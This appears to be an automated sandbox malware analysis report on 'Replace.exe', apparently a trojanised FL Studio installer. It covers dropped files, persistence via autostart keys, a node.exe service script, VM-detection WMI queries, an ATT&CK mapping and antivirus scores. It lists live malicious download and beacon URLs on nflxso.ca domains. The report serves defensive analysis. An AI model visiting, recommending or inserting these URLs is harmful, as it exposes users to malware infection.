Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper.status VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper.status VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\vp VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper.status VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper.status VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper.status VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Windows\SysWOW64\wbem\WMIC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper.status VolumeInformation
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BCC886 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00BCC886
Source: C:\Users\user\Desktop\Replace.exeCode function: 0_2_00BCB658 __EH_prolog3_GS,GetVersionExA,CreateThread,GetCommandLineW,MessageBoxW,MessageBoxW,MessageBoxW,ShellExecuteExA,MessageBoxW,MessageBoxW,CreateProcessA,CloseHandle,WaitForSingleObject,WaitForSingleObject,CloseHandle,WaitForSingleObject,CloseHandle,0_2_00BCB658

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts3
Command and Scripting Interpreter		1
Windows Service		1
Access Token Manipulation		21
Obfuscated Files or Information		LSASS Memory3
File and Directory Discovery		Remote Desktop Protocol1
Clipboard Data		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution		21
Registry Run Keys / Startup Folder		1
Windows Service		11
Software Packing		Security Account Manager35
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive11
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook122
Process Injection		1
DLL Side-Loading		NTDS221
Security Software Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
Registry Run Keys / Startup Folder		3
Masquerading		LSA Secrets131
Virtualization/Sandbox Evasion		SSHKeylogging3
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts131
Virtualization/Sandbox Evasion		Cached Domain Credentials3
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Access Token Manipulation		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
Process Injection		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Rundll32		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1434556 Sample: Replace.exe Startdate: 01/05/2024 Architecture: WINDOWS Score: 100 110 files.nflxso.ca 2->110 112 register.nflxso.ca 2->112 128 Multi AV Scanner detection for domain / URL 2->128 130 Antivirus detection for URL or domain 2->130 132 Antivirus detection for dropped file 2->132 134 4 other signatures 2->134 12 Replace.exe 3 2->12         started        15 rundll32.exe 2->15         started        17 rundll32.exe 2->17         started        19 2 other processes 2->19 signatures3 process4 dnsIp5 106 C:\Users\user\AppData\Local\...\wsc86FC.tmp, PE32 12->106 dropped 108 C:\Users\user\AppData\Local\Temp\...\run.exe, PE32+ 12->108 dropped 22 rundll32.exe 1 2 12->22         started        27 run.exe 6 12->27         started        29 rundll32.exe 15->29         started        31 rundll32.exe 2 17->31         started        114 192.168.2.4, 138, 443, 49204 unknown unknown 19->114 116 239.255.255.250 unknown Reserved 19->116 33 chrome.exe 19->33         started        35 node.exe 19->35         started        file6 process7 dnsIp8 118 files.nflxso.ca 172.67.152.151, 443, 49730, 49747 CLOUDFLARENETUS United States 22->118 96 C:\Users\user\AppData\Local\...\wnsA071.tmp, PE32 22->96 dropped 144 Creates multiple autostart registry keys 22->144 37 wnsA071.tmp 3 17 22->37         started        98 C:\Program Files\...\FLEngine_x64.dll, PE32+ 27->98 dropped 100 C:\Program Files\Image-Line\...\FL64.exe, PE32+ 27->100 dropped 146 Multi AV Scanner detection for dropped file 27->146 102 C:\Users\user\AppData\Local\...\wnsF0F3.tmp, PE32 29->102 dropped 148 System process connects to network (likely due to code injection or exploit) 29->148 41 wnsF0F3.tmp 29->41         started        104 C:\Users\user\AppData\Local\...\wnsCCC1.tmp, PE32 31->104 dropped 43 wnsCCC1.tmp 14 31->43         started        120 www.google.com 142.251.16.147, 443, 49734, 49735 GOOGLEUS United States 33->120 122 plus.l.google.com 172.253.122.101, 443, 49745 GOOGLEUS United States 33->122 124 2 other IPs or domains 33->124 file9 signatures10 process11 file12 92 C:\Users\user\AppData\Local\...\node.exe, PE32 37->92 dropped 94 C:\Users\user\AppData\Local\...\cleaner.exe, PE32 37->94 dropped 136 Antivirus detection for dropped file 37->136 138 Multi AV Scanner detection for dropped file 37->138 140 Creates an undocumented autostart registry key 37->140 142 Creates multiple autostart registry keys 37->142 45 cleaner.exe 1 37->45         started        48 cleaner.exe 41->48         started        50 cleaner.exe 41->50         started        52 cleaner.exe 43->52         started        54 cleaner.exe 43->54         started        signatures13 process14 signatures15 150 Multi AV Scanner detection for dropped file 45->150 152 Machine Learning detection for dropped file 45->152 56 node.exe 45->56         started        59 node.exe 48->59         started        61 node.exe 52->61         started        process16 dnsIp17 126 register.nflxso.ca 74.201.73.52, 49757, 6101 DEDICATEDUS United States 56->126 63 WMIC.exe 1 56->63         started        66 WMIC.exe 1 56->66         started        68 WMIC.exe 56->68         started        74 8 other processes 56->74 70 WMIC.exe 59->70         started        72 WMIC.exe 61->72         started        process18 signatures19 154 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 63->154 76 conhost.exe 63->76         started        78 conhost.exe 66->78         started        80 conhost.exe 68->80         started        82 conhost.exe 70->82         started        84 conhost.exe 74->84         started        86 conhost.exe 74->86         started        88 conhost.exe 74->88         started        90 5 other processes 74->90 process20

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Replace.exe29%ReversingLabsWin32.PUA.Presenoker
Replace.exe49%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp100%AviraPUA/Agent.clw
C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp100%AviraPUA/Agent.clw
C:\Users\user\AppData\Local\Temp\wsc86FC.tmp100%AviraTR/Spy.Gen
C:\Users\user\AppData\Local\Temp\wnsA071.tmp100%AviraPUA/Agent.clw
C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\wsc86FC.tmp100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\wnsA071.tmp100%Joe Sandbox ML
C:\Program Files\Image-Line\FL Studio 20\FL64.exe0%ReversingLabs
C:\Program Files\Image-Line\FL Studio 20\FL64.exe1%VirustotalBrowse
C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dll0%ReversingLabs
C:\Program Files\Image-Line\FL Studio 20\FLEngine_x64.dll6%VirustotalBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe88%ReversingLabsWin32.Trojan.Leonem
C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe73%VirustotalBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe0%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe9%ReversingLabs
C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe7%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\wnsA071.tmp83%ReversingLabsWin32.PUA.Presenoker
C:\Users\user\AppData\Local\Temp\wnsA071.tmp77%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp83%ReversingLabsWin32.PUA.Presenoker
C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp77%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp83%ReversingLabsWin32.PUA.Presenoker
C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp77%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\wsc86FC.tmp75%ReversingLabsWin32.Trojan.RealProtect
C:\Users\user\AppData\Local\Temp\wsc86FC.tmp67%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
files.nflxso.ca6%VirustotalBrowse
register.nflxso.ca1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object0%URL Reputationsafe
http://crl.dhimyotis.com/certignarootca.crl0%URL Reputationsafe
https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot0%URL Reputationsafe
http://www.accv.es000%URL Reputationsafe
https://sourcemaps.info/spec.html0%URL Reputationsafe
http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
https://heycam.github.io/webidl/#dfn-default-iterator-object0%URL Reputationsafe
https://heycam.github.io/webidl/#es-iterable-entries0%URL Reputationsafe
https://heycam.github.io/webidl/#es-interfaces0%URL Reputationsafe
https://files.nflxso.ca/t0%Avira URL Cloudsafe
https://files.nflxso.ca/d0%Avira URL Cloudsafe
https://files.nflxso.ca/downloads/winapp/latest-version.txt1%100%Avira URL Cloudmalware
http://register.nflxso.ca:6101/strvn0%Avira URL Cloudsafe
http://narwhaljs.org)0%Avira URL Cloudsafe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0%Avira URL Cloudsafe
https://files.nflxso.ca/downloads/winapp/latest-installer.exe3100%Avira URL Cloudmalware
https://files.nflxso.ca/downloads/winapp/latest-installer.exe-100%Avira URL Cloudmalware
http://html4/loose.dtd0%Avira URL Cloudsafe
http://register.nflxso.ca:6101/strvn2%VirustotalBrowse
https://files.nflxso.ca/d5%VirustotalBrowse
http://files.nflxso.ca/downloads/winapp/latest-version.txt0%Avira URL Cloudsafe
http://.css0%Avira URL Cloudsafe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlF0%Avira URL Cloudsafe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0%VirustotalBrowse
http://files.nflxso.ca/downloads/winapp/latest-version.txt5%VirustotalBrowse
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlF0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
plus.l.google.com
172.253.122.101
truefalse
    		high
    files.nflxso.ca
    		172.67.152.151
    		truetrueunknown
    www.google.com
    		142.251.16.147
    		truefalse
      		high
      register.nflxso.ca
      		74.201.73.52
      		truefalseunknown
      apis.google.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://register.nflxso.ca:6101/strvnfalse
        • 2%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://files.nflxso.ca/downloads/winapp/latest-version.txttrue
        • 5%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://url.spec.whatwg.org/#concept-url-originnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
          		high
          https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDashnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
            		high
            https://www.ecma-international.org/ecma-262/8.0/#sec-atomescapenode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
              		high
              https://www.image-line.com/newreleases/?username=%s&productcodes=%s&productversions=%srun.exe, 00000002.00000003.1768566979.000001981A9C7000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://files.nflxso.ca/drundll32.exe, 00000007.00000002.2229301918.0000000002F55000.00000004.00000020.00020000.00000000.sdmpfalse
                • 5%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.ecma-international.org/ecma-262/8.0/#prod-Atomnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                  		high
                  https://gist.github.com/XVilka/8346728#gistcomment-2823421node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                    		high
                    https://github.com/nodejs/node-v0.x-archive/issues/2876.node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                      		high
                      http://repository.swisssign.com/0node.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.ecma-international.org/ecma-262/#sec-timeclipnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                          		high
                          https://console.spec.whatwg.org/#tablenode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                            		high
                            https://nodejs.org/download/release/v12.22.12/win-x86/node.lib)node.exe, 0000000F.00000002.2921222937.0000000001F88000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://www.iana.org/assignments/tls-extensiontype-valuesnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                		high
                                https://console.spec.whatwg.org/#console-namespacenode.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                  		high
                                  https://url.spec.whatwg.org/#urlnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                    		high
                                    https://support.image-line.com/action/license/serial?serial=%srun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://encoding.spec.whatwg.org/#textencodernode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                        		high
                                        https://github.com/nodejs/node/issues/13435node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                          		high
                                          https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDashnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                            		high
                                            https://goo.gl/t5IS6M).node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                              		high
                                              https://tools.ietf.org/html/rfc7230#section-3.2.2node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                		high
                                                https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                  		high
                                                  https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                    		high
                                                    https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertionnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                      		high
                                                      https://tc39.github.io/ecma262/#sec-%iteratorprototype%-objectnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://url.spec.whatwg.org/#concept-urlencoded-serializernode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                        		high
                                                        http://crl.dhimyotis.com/certignarootca.crlnode.exe, 0000000F.00000002.2923728743.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://nodejs.org/download/release/v12.22.12/win-x86/node.libnode.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://files.nflxso.ca/trundll32.exe, 00000001.00000002.2142874146.00000000028CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3Fnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                            		high
                                                            http://repository.swisssign.com/Tnode.exe, 0000000F.00000002.2922964130.00000000042D7000.00000004.00000020.00020000.00000000.sdmp, node.exe, 0000000F.00000003.2451444266.00000000042D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.image-line.com/redirect/downloadnewsrssrun.exe, 00000002.00000003.1768566979.0000019819FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://nodejs.org/api/fs.htmlnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                  		high
                                                                  https://github.com/chalk/ansi-regex/blob/master/index.jsnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                    		high
                                                                    https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gzh~node.exe, 0000001E.00000002.2323547377.0000000013D1A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://github.com/nodejs/node/pull/21313node.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                        		high
                                                                        https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRangesnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                          		high
                                                                          https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                            		high
                                                                            https://files.nflxso.ca/downloads/winapp/latest-version.txt1%node.exe, 0000000F.00000003.2232924754.00000000061C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://www.midnight-commander.org/browser/lib/tty/key.cnode.exe, 0000000F.00000002.2913751697.0000000000E01000.00000040.00000001.01000000.0000000C.sdmp, node.exe, 00000017.00000002.2240618921.0000000000E01000.00000040.00000001.01000000.0000000C.sdmpfalse
                                                                              		high
